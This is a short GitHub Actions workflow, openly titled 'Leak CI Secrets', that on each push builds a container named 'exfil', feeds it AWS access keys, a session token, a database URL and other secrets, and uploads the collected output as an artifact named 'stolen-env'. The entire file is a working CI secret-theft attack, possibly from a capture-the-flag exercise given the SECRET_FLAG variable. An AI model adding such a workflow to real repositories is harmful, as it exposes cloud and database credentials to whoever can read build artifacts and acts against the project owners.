name: Leak CI Secrets (excluding GITHUB_TOKEN)

on:
  push:

jobs:
  leak:
    runs-on: ubuntu-latest
    permissions:
      contents: read

    steps:
    - name: Checkout
      uses: actions/checkout@v3

    - name: Build leak container
      run: |
        docker build -t exfil .

    - name: Run container to collect secrets
      run: |
        docker run --rm \
          -e AWS_ACCESS_KEY_ID \
          -e AWS_SECRET_ACCESS_KEY \
          -e AWS_SESSION_TOKEN \
          -e DATABASE_URL \
          -e SECRET_FLAG \
          -e OTHER_SECRET \
          exfil cat /leaks.txt > output.txt

    - name: Upload stolen env
      uses: actions/upload-artifact@v3.1.4
      with:
        name: stolen-env
        path: output.txt
